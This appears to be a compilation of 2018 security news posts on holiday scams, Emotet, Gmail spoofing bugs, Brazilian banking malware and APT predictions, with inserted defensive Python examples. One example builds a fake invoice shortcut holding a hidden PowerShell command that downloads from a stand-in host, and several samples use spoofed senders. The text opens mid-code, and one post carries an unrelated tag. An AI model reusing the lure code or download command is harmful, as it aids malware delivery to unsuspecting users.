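        reasons.append(f"brand '{brand}' used outside the registrable label")
    if len(labels_of(candidate.domain)) > MAX_LABELS:
        reasons.append("too many labels")
    if candidate.created is not None:
        age = (today - candidate.created).days
        if age <= NEW_DOMAIN_DAYS:
            reasons.append(f"registered {age} days ago")
    return reasons


# Constructed sample: a reference date just before Black Friday 2018 and five domains.
TODAY = date(2018, 11, 22)
SAMPLE = [
    Candidate("aliexpress.com", date(2010, 1, 1)),                 # brand is the registrable label
    Candidate("internet-shop.ru", date(2012, 3, 1)),               # the hypothetical shop itself
    Candidate("internet.shop.ru", date(2018, 8, 14)),              # the pattern from the tip for brands
    Candidate("aliexpress.com.deals-sale.club", date(2018, 11, 5)),
    Candidate("shop.aliexpress.con.su.club", None),                # many dots, no WHOIS date
]


def triage_sample(today=TODAY, sample=SAMPLE) -> dict:
    return {c.domain: triage(c, today) for c in sample}


if __name__ == "__main__":
    for domain, reasons in triage_sample().items():
        print(f"{domain:32} {'OK' if not reasons else '; '.join(reasons)}")
```

The squashing step is what catches the internet.shop.ru case from the brand tips: the brand string survives when dots and hyphens are removed, but the registrable label is no longer the brand. Feeding real candidates into `triage` only needs a WHOIS or RDAP lookup to fill in `created`.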

About the Author: Group-IB Corporate Communications 

http://www.group-ib.ru

https://www.group-ib.ru/blog/

Pierluigi Paganini

(Security Affairs – Black Friday, Cybercrime)

The post Beware Black Friday & Cyber Monday shoppers: fake products, credit cards scams and other types of fraud appeared first on Security Affairs.

New Emotet Thanksgiving campaign differs from previous ones

Researchers from Forcepoint observed a new Emotet Thanksgiving-themed campaign that appears quite different from previous ones.

Security researchers from Forcepoint have observed a new Emotet Thanksgiving-themed campaign that appears quite different from previous ones.

EMOTET, aka Geodo, is a banking trojan linked to the dreaded Dridex and Feodo (Cridex/Bugat) malware families.

In past campaigns, EMOTET was used by crooks to steal banking credentials and as a malicious payload downloader.

According to the experts, the Thanksgiving-themed campaign targeted U.S. users this week.

“After a hiatus of some weeks, we observed Emotet returning in mid-November with upgraded macro obfuscation and formatting. On 19 November, it began a US-centric Thanksgiving-themed campaign. As many will know this is a departure from the standard financial themes regularly seen.” reads the analysis published by Forcepoint.

The new campaign leverages an improved variant of the malware that implements new features and modules. Experts pointed out that this is the first campaign that doesn’t use financial themes.

The crooks behind the recent Emotet campaign sent out roughly 27,000 messages daily; below is a sample of the Thanksgiving-themed message:

(Image: sample Thanksgiving-themed Emotet message)

The attachment is an XML file masquerading as a .doc, with embedded macros leading to the standard PowerShell downloader normally observed with the Emotet banking Trojan, which is also used by crooks to drop other payloads.

“However, the document in this case is not the usual .doc or .docx but rather an XML file masquerading as a .doc, and the macro in this instance makes use of the Shapes feature, ultimately leading to the calling of the shell function using a WindowStyle of vbHide.” continues the expert.

The macro has recently evolved from the usual Emotet pattern: it implements upgraded macro obfuscation and formatting.
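Because the attachment's content (Word 2003 XML) does not match its extension (.doc), a mail gateway can catch this class of lure by looking at the bytes rather than the file name. The script below is an added Python example, not Forcepoint's detection logic; the sample attachments are constructed byte strings, not real Emotet samples. It distinguishes the legacy binary .doc container (OLE compound file), the OOXML zip container and the Word 2003 XML prolog with its mso-application processing instruction, and it also notes a w:binData element, which is assumed here to be where a Word 2003 XML document carries embedded binary data such as a VBA project.

```python
"""Check whether an e-mail attachment's bytes match its extension.

Added Python example, not Forcepoint's detection logic. The sample
attachments are constructed byte strings, not real Emotet samples.
"""
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy binary .doc (OLE compound file)
ZIP_MAGIC = b"PK\x03\x04"                          # OOXML .docx/.docm (zip container)
XML_PROLOG = b"<?xml"
WORD_XML_PI = b'progid="Word.Document"'            # Word 2003 XML processing instruction
BINDATA_TAG = b"<w:binData"                        # embedded binary blob in Word 2003 XML

# Container formats that are legitimate for each extension.
EXPECTED_FORMATS = {
    "doc": {"ole"}, "dot": {"ole"},
    "docx": {"ooxml"}, "docm": {"ooxml"},
    "xml": {"xml", "word-xml"},
}


def detect_format(data: bytes) -> str:
    """Classify by leading bytes, tolerating a UTF-8 BOM before an XML prolog."""
    head = data[:4096]
    if head.startswith(OLE_MAGIC):
        return "ole"
    if head.startswith(ZIP_MAGIC):
        return "ooxml"
    if head.lstrip(b"\xef\xbb\xbf").startswith(XML_PROLOG):
        return "word-xml" if WORD_XML_PI in head else "xml"
    return "unknown"


def assess_attachment(filename: str, data: bytes) -> dict:
    """Return what the bytes are, whether that contradicts the extension, and a verdict."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    fmt = detect_format(data)
    mismatch = ext in EXPECTED_FORMATS and fmt not in EXPECTED_FORMATS[ext]
    embedded_binary = fmt == "word-xml" and BINDATA_TAG in data
    if mismatch:
        verdict = "quarantine"      # the content lies about what it is
    elif embedded_binary:
        verdict = "review"          # honest .xml, but it carries a binary blob
    else:
        verdict = "allow"
    return {"extension": ext, "detected": fmt, "mismatch": mismatch,
            "embedded_binary": embedded_binary, "verdict": verdict}


# Constructed samples: only the leading bytes matter, the rest is filler.
WORD_XML_LURE = (
    b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    b'<?mso-application progid="Word.Document"?>'
    b'<w:wordDocument xmlns:w="http://schemas.microsoft.com/office/word/2003/wordml">'
    b'<w:binData w:name="editdata.mso">QUFBQQ==</w:binData>'
    b'<w:body><w:p><w:r><w:t>Happy Thanksgiving</w:t></w:r></w:p></w:body>'
    b'</w:wordDocument>'
)
SAMPLES = {
    "invoice.doc": OLE_MAGIC + b"\x00" * 64,
    "report.docx": ZIP_MAGIC + b"\x00" * 64,
    "thanksgiving.doc": WORD_XML_LURE,          # XML masquerading as .doc
    "settings.xml": b'<?xml version="1.0"?><config/>',
}


def assess_samples(samples=SAMPLES) -> dict:
    return {name: assess_attachment(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, result in assess_samples().items():
        print(f"{name:18} {result['detected']:9} {result['verdict']}")
```

The point of the `review` verdict is that an honestly named .xml Word document with a binary blob is unusual but not a lie, whereas a .doc that begins with an XML prolog has no legitimate reason to exist and can be quarantined without a signature for the specific macro.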

“In the few weeks since Emotet returned it has undergone some interesting changes, most notably in the new Thanksgiving theme and macro obfuscation discussed previously.” concludes Forcepoint.

“Whilst not completely novel (use of XML files to conceal macros was reported by Trustwave back in 2015) it does pose a challenge to defenders due to the sheer volume of emails sent, as detection signatures need to be rapidly created to stem the onrushing tide.”

Further details, including IoCs are reported in the analysis published by the experts.

Pierluigi Paganini

(Security Affairs – banking trojan, spam)

The post New Emotet Thanksgiving campaign differs from previous ones appeared first on Security Affairs.

Spoofed addresses and anonymous sending: new Gmail bugs make for easy pickings

Tim Cotten, a software developer from Washington, DC, was responding to a request for help from a female colleague last week, who believed that her Gmail account had been hacked, when he discovered something phishy. The evidence presented was several emails in her Sent folder, purportedly sent by her to herself.

Cotten was stunned when, upon initial diagnosis, he found that those sent emails didn’t come from her account but from another, which Gmail—being the organized email service that it is—only filed away in her Sent folder. Why would it do that if the email wasn’t from her? It seems that while Google’s filtering and organizing technology worked perfectly, something went wrong when Gmail tried to process the emails’ From fields.

This trick is a treat for phishers

Cotten noted in a blog post that the From header of the emails in his coworker’s Sent folder contained (1) the recipient’s email address and (2) another text—usually a name, possibly for increased believability. The presence of the recipient’s address caused Gmail to move the email to the Sent folder while also disregarding the email address of the actual sender.

Weird “From” header. Screenshot by Tim Cotten, emphasis (in purple) ours.

Why would a cybercriminal craft an email that never ends up in a victim’s inbox? This tactic is particularly useful for a phishing campaign that banks on the recipient’s confusion.

“Imagine, for instance, the scenario where a custom email could be crafted that mimics previous emails the sender has legitimately sent out containing various links. A person might, when wanting to remember what the links were, go back into their sent folder to find an example: disaster!” wrote Cotten.

Cotten provided a demo for Bleeping Computer in which he showed a potentially malicious sender spoofing the From field by displaying a different name to the recipient. This could yield a high number of victims if used in a business email compromise (BEC)/CEO fraud campaign, Bleeping Computer noted.

After raising an alert about this bug, Cotten unknowingly opened the floodgates for other security researchers to come forward with their discovered Gmail bugs. Eli Grey, for example, shared the discovery of a bug in 2017 that allowed for email spoofing, which has been fixed in the web version of Gmail but remains a flaw in the Android version. One forum commenter claimed that the iOS Mail app also suffers from the same glitch.

Another one stirs the dust

Days after publicly revealing the Gmail bug, Cotten discovered another flaw wherein malicious actors can potentially hide sender details in the From header by forcing Gmail to display a completely blank field.

Who’s the sender? Screenshot by Tim Cotten, emphasis (in purple) ours.

He pulled this off by replacing a portion of his test case with a long and arbitrary code string, as you can see below:

The string. Screenshot from Tim Cotten, emphasis (in purple) ours.

Average Gmail users may struggle to reveal the true sender because clicking the Reply button and the “Show original” option still yields a blank field.

Screenshot by Tim Cotten, emphasis (in purple) ours.

There’s nothing there! Screenshot by Tim Cotten, emphasis (in purple) ours.

Missing sender details could increase the likelihood of users opening a malicious email and clicking an embedded link or opening an attachment, especially if the subject line is both actionable and urgent.
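Both display problems described above come down to what a client does with a From header that is syntactically odd: one puts the recipient's own address where Gmail looks for the sender, the other leaves nothing parseable to render. As an added example (not Tim Cotten's or Malwarebytes' code), the Python routine below parses From strictly and compares it against the envelope sender recorded in Return-Path (added by the receiving MTA), flagging the conditions behind each screenshot: a From address equal to the recipient's own while Return-Path differs, a display name that is itself an address, and a From value with no valid address in it. The message samples are constructed, and the 998-character bound is borrowed from the RFC 5322 line limit as an assumed sanity threshold.

```python
"""Added example (not Tim Cotten's or Malwarebytes' code): heuristic From-header
checks for the two Gmail display issues described above. Message samples are
constructed; the 998-character threshold is an assumed bound taken from RFC 5322."""
import re
from email import message_from_string
from email.utils import parseaddr

# Minimal addr-spec shape: one local part, one '@', a dotted domain.
_ADDR_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def inspect_sender(raw_message: str, own_address: str) -> dict:
    """Parse the From header strictly and report why it should not be trusted."""
    # compat32 policy hands back raw header strings and never raises on odd input
    msg = message_from_string(raw_message)
    from_header = msg.get("From") or ""
    display_name, from_addr = parseaddr(from_header)
    return_path = parseaddr(msg.get("Return-Path") or "")[1]
    own = own_address.lower()

    findings = []
    if not _ADDR_RE.match(from_addr):
        # junk where the address should be: nothing valid for a client to render,
        # which is the "blank sender" case
        findings.append("from-address-invalid")
    if len(from_header) > 998:
        findings.append("from-header-oversized")
    if "@" in display_name:
        # a display name that looks like an address is a classic spoofing tell;
        # clients that render only the name show the attacker's choice
        findings.append("address-like-display-name")
    if from_addr.lower() == own and return_path and return_path.lower() != own:
        # header claims "you" sent it, but the envelope sender is someone else:
        # the condition that got messages misfiled into the Sent folder
        findings.append("from-is-self-envelope-differs")

    return {"display_name": display_name, "address": from_addr, "findings": findings}


# Constructed samples (not real captured mail); the recipient is bob@example.com.
LEGIT = (
    "From: Alice Example <alice@example.com>\r\n"
    "Return-Path: <alice@example.com>\r\n"
    "To: bob@example.com\r\n"
    "Subject: lunch\r\n\r\nnoon?\r\n"
)
SELF_SPOOF = (
    'From: "Bob Example" <bob@example.com>\r\n'
    "Return-Path: <bounce@mailer.evil.example>\r\n"
    "To: bob@example.com\r\n"
    "Subject: those links again\r\n\r\nhttp://evil.example/\r\n"
)
NAME_SPOOF = (
    'From: "ceo@example.com" <random@evil.example>\r\n'
    "Return-Path: <random@evil.example>\r\n"
    "To: bob@example.com\r\n"
    "Subject: urgent wire\r\n\r\nplease handle\r\n"
)
BLANK_SENDER = (
    "From: " + "A" * 1200 + "\r\n"
    "Return-Path: <random@evil.example>\r\n"
    "To: bob@example.com\r\n"
    "Subject: invoice\r\n\r\nsee attached\r\n"
)

if __name__ == "__main__":
    for label, sample in (("legit", LEGIT), ("self", SELF_SPOOF),
                          ("name", NAME_SPOOF), ("blank", BLANK_SENDER)):
        print(label, inspect_sender(sample, "bob@example.com"))
```

The useful design point is to treat From as untrusted display data and let the envelope sender and the parse result drive the decision; a client that files mail by whichever address it finds in From, or renders an empty string when the parse fails, is doing the opposite.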

When met with silence

The Gmail vulnerabilities mentioned in this post are all related to user experience (UX), and as of this writing, Google has yet to address them. (Cotten has proposed a possible solution for the tech juggernaut.) Unfortunately, Gmail users can only wait for the fixes.

Spotting phishing attempts or spoofed emails can be tricky, especially when cybercriminals are able to penetrate trusted sources, but a little vigilance can go a long, long way.

The post Spoofed addresses and anonymous sending: new Gmail bugs make for easy pickings appeared first on Malwarebytes Labs.

Easy Does It! A Timely Look Into Fraud TTPs in the Brazilian Financial Cybercrime Landscape

Financial cybercrime in Brazil is one of the most geographically specific landscapes, in which local cybercriminals attack local internet users. With close to 210 million residents in the country, criminals have a rich hunting ground. Some reports cite losses of nearly 70 billion Brazilian reals, about $18.6 billion, to fraud and online scams in 2017.

In following the evolution of cyber activity in Brazil, IBM Security sees this threat landscape as unique, where technical sophistication is neither the norm nor a requirement. In this first article of a two-part series, we expose some of our recent research on the typical malware and tactics, techniques and procedures (TTPs) used against Brazilian online banking users.

In contrast to the rising sophistication seen in other parts of the globe, one of the most striking characteristics of cybercrime in Brazil is its simplicity. Attackers often use their familiarity with how local users browse the internet to take advantage of them and steal their money.

Internet Access Spreads Far and Wide in Brazil, But User Education Is Still Scarce

The majority of global internet users are located in East and South Asia, and China is the largest online market in the world. Fourth on the global chart, Brazil is the largest internet market in Latin America, with nearly 140 million internet users as of 2016, according to Statista.

Internet access has grown rapidly in Brazil in the past decade, with nearly 77 percent of residents accessing the internet from home in some of the more populated regions of the country.

Figure 1: A regional estimate of the percentage of homes with internet access in Brazil (Source: The Brazilian Institute of Geography and Statistics)

However, while more Brazilians than ever have access to internet-enabled services, many users are still not well versed in using them safely. Regardless of the browser or search engine, it is not unusual for users to search for a site they want to reach and click the first result without a second thought. When it comes to online banking, for example, some do not type their bank's URL into the address bar but search for it and browse to the top result. Fraudsters rely on this behavior and push poisoned links to the top of search results to trap those unaware of the risk.

When the Going Gets Tough…Become a Cybercriminal?

The drivers of crime in Brazil stem from socio-economic difficulty. In addition, laws are either nonexistent or not strict enough to deter people from becoming online thieves.

The minimum wage in Brazil stands at 969 reals (around $258) per month, as reported by The Rio Times. Brazilian Institute of Geography and Statistics (IBGE) data from 2017 shows that “more than 50 million Brazilians, nearly 25 percent of the population, live below the poverty line, and have family incomes of R$387.07 per month.”

Many Brazilians have never had it easy when it comes to their socio-economic situations. Since necessity is the mother of invention, that reality is also what makes Brazilians quite creative in problem solving. In many cases, the main problem for everyday people in Brazil is the lack of financial resources to sustain themselves and their families. That’s where creative thinking comes into play — sometimes in good ways and, unfortunately, sometimes in the shape of financial cybercrime.

Remote Overlay Malware Is the Way to Go

Financial threats targeting online banking users in Brazil are a rather monotonous bunch. Most code is based on overlay malware and written in the Delphi programming language — code that is neither elaborate nor modular. Why spend a chunk of money buying or building state-of-the-art malware, wrapping it up in end-to-end encryption and enabling it to gain rootkit privileges on devices, when you only need simple malware to trick users into unwittingly giving up their credentials?

With evolving controls that curb attackers’ ability to use phished credentials, using malware is the preferred method in Brazil, offering a better return on investment for less effort. But how are everyday fraudsters operating the malware supply chain without much technical savvy? That’s where creative thinking and being local come into play. It is also why so many fraudsters in Brazil use very similar malware codes that do mostly the same things — namely, remote overlay.

As its name suggests, remote overlay involves remotely plastering fake images and application interfaces over the user's screen, locking the victim out of an authenticated online banking session while the attacker operates it and tricking them into divulging additional information. This type of malware is by far the most common in Brazil nowadays, and threat actors have little reason to change it.

Brazilian Fraudsters Don’t Complicate Things When Easy Does It

Using malware is one thing, but first, it has to reach unsuspecting users. Without technical know-how, most Brazilian fraudsters do not operate exploit kits, which can be costly and often require technical support from cybercrime vendors. Recent attacks that our team analyzed show that most attackers prefer victims to come to them by putting a consumer spin on the watering hole attack tactic.

In Brazil, residents can download their monthly invoices and tax bills from the corresponding vendor’s website or government site. It is common practice for people to log in to an online utility account, for example, and download their bill. By setting up a malicious replica of such a site, criminals can attract a large number of users to that page and trick them into downloading a fake bill, thereby having them willingly fetch a Trojanized file and unknowingly launch the malware infection on their devices.

But without using an exploit kit or relying on high-traffic sites, how will that malicious infection zone become known to potential victims? Knowing that many people in Brazil are in the habit of searching for websites via search engines rather than typing their exact URL into the address bar, the obvious choice is to pay for a sponsored advertisement to have the malicious page top the search results. To keep their own identities out of sight, cybercriminals pay for sponsored ads with stolen credit card information, saving themselves both money and risk.

Posting malicious ads on popular search engines is no stroke of genius, and it is a surefire way to get those ads spotted by security controls and promptly taken down. Fraudsters using this tactic therefore rely on short, aggressive bursts of luring people to their phishing pages. Since they do not pay for the ads themselves and can spin up a malicious page very quickly, they can still get enough clicks to make each attack worthwhile.

To further protect their malicious site for a long enough period to trap as many users as possible, fraudsters often use stolen payment cards to pay for legitimate services that optimize their site’s performance and mitigate the risk of a distributed denial-of-service (DDoS) attack.

Figure 2: Phishing site data on VirusTotal

Figure 3: Phishing site uses DDoS protection

IBM X-Force noted that recent campaigns spreading malware through sponsored URLs were carefully targeted, focusing on a specific region on specific days. For example, these campaigns often impersonate a state's power company around the due date of that month's bill, exploiting the timely context of visitors trying to pay their invoice to infect them with remote overlay Trojans.

As users attempt to download their invoices, they actually receive a ZIP file containing a Windows shortcut file (.LNK) that points to an executable. That executable then downloads additional malware components to infect the user's device. Victims see only a file that opens to nothing and may try to download it again, which our researchers witnessed in many cases.
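The delivery chain above (ZIP, then a shortcut, then whatever the shortcut launches) is easy to triage at a gateway because a .LNK is a documented binary format: the MS-SHLLINK header carries a LinkFlags field that says which string fields follow, a ShowCommand that says how the window opens, and the StringData section holds the relative target path and the command-line arguments. As an added example (not IBM X-Force's code), the Python below parses those fields, skips the opaque IDList and LinkInfo blocks when present, and flags any shortcut in an archive that launches a script interpreter, carries a URL, or asks for a minimized window. The archive, its "fatura" file name and the PowerShell command line are constructed for the demo, not taken from a captured sample; the shortcut is synthesized by the same code so that the parser is exercised on a well-formed file.

```python
"""Added example (not IBM X-Force's code): parse a Windows shortcut (.LNK) per the
MS-SHLLINK layout and triage a ZIP that delivers one, as in the fake-invoice lure
described above. The archive, file name and command line are constructed."""
import io
import struct
import zipfile

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (MS-SHLLINK 2.1.1); StringData fields appear in this order.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that starts the target minimized
INTERPRETERS = ("powershell", "cmd.exe", "mshta", "wscript", "cscript", "rundll32")


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, ShowCommand and the StringData fields of a shortcut."""
    if (len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:       # IDListSize (2 bytes) + opaque item IDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                 # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    result = {"flags": flags, "show_command": show_command}
    for flag, name in STRING_FIELDS:          # CountCharacters (2 bytes) + characters
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos:pos + count * width]
            result[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
            pos += count * width
    return result


def build_lnk(relative_path: str, arguments: str, show_command: int) -> bytes:
    """Synthesize a minimal but well-formed .lnk (used only to feed the parser)."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    id_list = struct.pack("<H", 4) + b"\x1f\x50" + b"\x00\x00"  # one opaque ItemID + TerminalID
    body = struct.pack("<H", len(id_list)) + id_list
    for s in (relative_path, arguments):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body + b"\x00\x00\x00\x00"                   # empty ExtraData terminal block


def triage_zip(zip_bytes: bytes) -> list:
    """Flag shortcuts inside an archive that launch an interpreter or fetch a URL."""
    report = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            lnk = parse_lnk(zf.read(info))
            target = (lnk.get("relative_path", "") + " " + lnk.get("arguments", "")).lower()
            findings = []
            if any(tok in target for tok in INTERPRETERS):
                findings.append("launches-interpreter")
            if "http://" in target or "https://" in target:
                findings.append("downloads-from-url")
            if lnk["show_command"] == SW_SHOWMINNOACTIVE:
                findings.append("window-minimized")
            report.append({"member": info.filename, "target": target, "findings": findings})
    return report


def build_sample_zip() -> bytes:
    """Constructed lure: a 'fatura' (invoice) ZIP holding one shortcut to PowerShell."""
    lnk = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                    '-WindowStyle Hidden -Command "Invoke-WebRequest http://fatura.example/boleto.dat'
                    ' -OutFile $env:TEMP\\b.dat"', SW_SHOWMINNOACTIVE)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Fatura_11_2018.lnk", lnk)
    return buf.getvalue()


if __name__ == "__main__":
    for entry in triage_zip(build_sample_zip()):
        print(entry)
```

A shortcut whose only job is to hand a URL to an interpreter has no business arriving as an "invoice", so any one of the three findings is enough to hold the archive; parsing the fields rather than grepping the file also keeps the check working when the command line is obfuscated in ways that defeat simple string matching on the raw bytes.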

Need Help With Your Attack Campaign?

When it comes to financial cybercrime, technical sophistication, while not entirely absent, is not very common in the Brazilian threat landscape. In many cases, cybercriminals in the region are newcomers to the trade and need help to become familiar with the works of online fraud.

To fill in the gaps, these newcomers receive assistance from other criminals in the shape of tutorials, lessons, tools and wares to help them along — a marketplace that’s comparable to other dark web and underground forums across the globe.

In the images below, we can see that selling information and tools is a dynamic business in Brazil. Each of the following screen captures shows commodities offered to fraudsters, including compromised data, web resources and platforms to launch attacks, blackhat lead generation help, and cash-out services. The same types of vendors also offer malware for sale.

Figure 4: Cybercriminals often offer services and commodities to help other criminals along.

Dark web marketplaces spread knowledge and train more criminals on fraud tactics. Localized cybercrime ecosystems are more targeted, which boosts their efficiency and adverse effects.

A Word to the Wise: Top Tips for Safer Web Browsing

While it is easy for Brazilian users to get infected with malware, infections cannot occur without user interaction. This is in contrast to other parts of the world, where people can often get infected simply by visiting a compromised page through a drive-by download from an exploit kit, for example.

Below are some consumer tips for safer browsing, adapted to the popular infection scenarios in Brazil:

  • Don’t search for the homepage of important accounts. Poisoned search engine results can easily lead users to a malicious page. For important accounts, especially those involving payments, type the URL into the address bar or save the genuine website in the browser’s favorites list and access it from there.
  • Double-check the site before downloading files. Before clicking to download an invoice, double-check the domain and its credentials — a malicious site might be written with a spelling mistake or use a different top-level domain (TLD).
  • Make sure the site is secure. Legitimate banking and billing sites now use Hypertext Transfer Protocol Secure (HTTPS), which encrypts the connection. Look for a lock icon in the address bar and click it to check that the certificate was issued to the organization you expect; a padlock alone does not prove a site is genuine, since phishing sites can obtain certificates too. Most popular web browsers will alert users to a site that is not secured or, worse, dangerous to visit. If that's the case, close the page and contact the service provider directly to pay a bill.
  • Get genuine security software for your devices. Even though regular antivirus software can take longer to detect new banking malware, it can offer some protection against known threats, which are what hits users most often. Use and update an antivirus program on your home and mobile devices.
  • Keep your operating system (OS) and all applications up to date. Cybercriminals can take advantage of bugs and flaws in unpatched systems to compromise or infect them with malware. Apply patches and updates as soon as they become available to limit vulnerability.
  • Stay away from counterfeit software. All major software vendors have one, if not many, application security teams. Anyone offering up counterfeit software goes to great lengths to bypass the original vendor’s controls and, as a result, counterfeit applications are often weaker and open up backdoors to devices. Stay away from counterfeit applications and favor open source or freeware programs if you cannot afford to buy original software.
  • Last, but not least: education. One of the most important ways to help prevent malware infections and online banking fraud is user education. While security controls can help mitigate risks, they can’t replace user vigilance. Organizations and service providers alike should offer information that can help users become more aware of attack tactics and the risks associated with them.

Malware is prolific, but with the right risk management solution, you can prevent fraud while establishing digital identity trust throughout your customer’s online journey.

The post Easy Does It! A Timely Look Into Fraud TTPs in the Brazilian Financial Cybercrime Landscape appeared first on Security Intelligence.

Conficker: A 10-year retrospective on a legendary worm

This November marked the 10-year anniversary of Conficker, a fast-spreading worm targeting Microsoft systems that went on to claim one of the highest levels of infection in history. Millions of computers were eventually infected by the worm, including hospitals across Europe as well as ordinary consumers. Looking back to my time helping to defeat the worm however, it is apparent that the outbreak also helped to elevate the security industry and shape many of the … More

The post Conficker: A 10-year retrospective on a legendary worm appeared first on Help Net Security.

The holiday season and cybercrime: 8 ways to protect yourself

The holiday season has become an unbridled online spending extravaganza, and threat actors have taken notice. For shoppers, what starts out as an attempt to fulfill their holiday shopping checklist for pennies on the dollar can turn into a financial nightmare. For brands, what begins as an event that significantly boosts sales can turn into a security fiasco that erodes the trust between them and their customers and prospects. Cyber Monday 2017 was the largest … More

The post The holiday season and cybercrime: 8 ways to protect yourself appeared first on Help Net Security.

Security Affairs: Two hackers involved in the TalkTalk hack sentenced to prison

Two men from Tamworth, Staffordshire were sentenced to prison for their roles in the 2015 TalkTalk hack.

Two men, Connor Allsopp, 21, and Matthew Hanley, 23, pleaded guilty to charges of hacking. Allsopp was sentenced to eight months in jail and Hanley to 12 months.

In October 2015, TalkTalk Telecom Group plc publicly disclosed that four million subscribers had been impacted by a “sustained cyberattack” on its servers. The figure was later revised down: the company revealed that 156,959 customers were affected.

Hackers accessed the names, addresses, dates of birth, email addresses and phone numbers of the company's customers; they also accessed financial data for 15,000 users.

Attackers also attempted to blackmail TalkTalk's CEO, Dido Harding.

“We have been contacted by, I don’t know whether it is an individual or a group purporting to be the hacker,” Dido Harding said to the BBC. “It is a live criminal investigation. All I can say is I have personally received a contact from someone purporting as I say…to be the hacker looking for money.”

The security breach had a significant impact on the company, overall losses have been estimated at £77 million ($99 million).

The U.K. Information Commissioner’s Office (ICO) handed TalkTalk a record £400,000 ($510,000) fine for the data breach.

Other people were arrested after the TalkTalk security breach, most of them youngsters.

In the weeks after the attack, police arrested a 15-year-old from Northern Ireland and a 16-year-old boy from Feltham.

In November 2015, another young hacker from Norwich was arrested by the British police.

Pierluigi Paganini

(Security Affairs – TA505, tRat)

The post Two hackers involved in the TalkTalk hack sentenced to prison appeared first on Security Affairs.

Securelist: Kaspersky Security Bulletin: Threat Predictions for 2019

There’s nothing more difficult than predicting. So, instead of gazing into a crystal ball, the idea here is to make educated guesses based on what has happened recently and where we see a trend that might be exploited in the coming months.

Asking the most intelligent people I know, and basing our scenario on APT attacks because they traditionally show the most innovation when it comes to breaking security, here are our main ‘predictions’ of what might happen in the next few months.

No more big APTs

What? How is it possible that in a world where we discover more and more actors every day the first prediction seems to point in the opposite direction?

The reasoning behind this is that the security industry has consistently discovered highly sophisticated government-sponsored operations that took years of preparation. What seems to be a logical reaction to that situation from an attacker’s perspective would be exploring new, even more sophisticated techniques that are much more difficult to discover and to attribute to specific actors.

Indeed, there are many different ways of doing this. The only requirement would be an understanding of the techniques used by the industry for attribution and for identifying similarities between different attacks and the artifacts used in them, something that doesn’t seem to be a big secret. With sufficient resources, a simple solution for an attacker could be having different ongoing sets of activity that are very difficult to relate to the same actor or operation. Well-resourced attackers could start new innovative operations while keeping their old ones alive. Of course, there’s still a good chance of the older operations being discovered, but discovering the new operations would pose a greater challenge.

Instead of creating more sophisticated campaigns, in some cases it appears to be more efficient for some very specific actors who have the capability to do so, to directly target infrastructure and companies where victims can be found, such as ISPs. Sometimes this can be accomplished through regulation, without the need for malware.

Some operations are simply externalized to different groups and companies that use different tools and techniques, making attribution extremely difficult. It’s worth keeping in mind that in the case of government-sponsored operations this ‘centrifugation’ of resources and talent might affect the future of such campaigns. Technical capabilities and tools are owned by the private industry in this scenario, and they are for sale for any customer that, in many cases, doesn’t fully understand the technical details and consequences behind them.

All this suggests that we’re unlikely to discover new highly sophisticated operations – well-resourced attackers are more likely to simply shift to new paradigms.

Networking hardware and IoT

It just seemed logical that at some point every actor would deploy capabilities and tools designed to target networking hardware. Campaigns like VPNFilter were a perfect example of how attackers have already started deploying their malware to create a multipurpose ‘botnet’. In this particular case, even when the malware was extremely widespread, it took some time to detect the attack, which is worrisome considering what might happen in more targeted operations.

Actually, this idea can go even further for well-resourced actors: why not directly target even more elemental infrastructure instead of just focusing on a target organization? We haven’t reached that level of compromise (to our knowledge), but it was clear from past examples (like Regin) how tempting that level of control is for any attacker.

Vulnerabilities in networking hardware allow attackers to follow different directions. They might go for a massive botnet-style compromise and use that network in the future for different goals, or they might approach selected targets for more clandestine attacks. In this second group we might consider ‘malware-less’ attacks, where opening a VPN tunnel to mirror or redirect traffic might provide all the necessary information to an attacker.

All these networking elements might also be part of the mighty IoT, where botnets keep growing at an apparently unstoppable pace. These botnets could be incredibly powerful in the wrong hands when it comes to disrupting critical infrastructure, for instance. This can be abused by well-resourced actors, possibly using a cover group, or in some kind of terror attack.

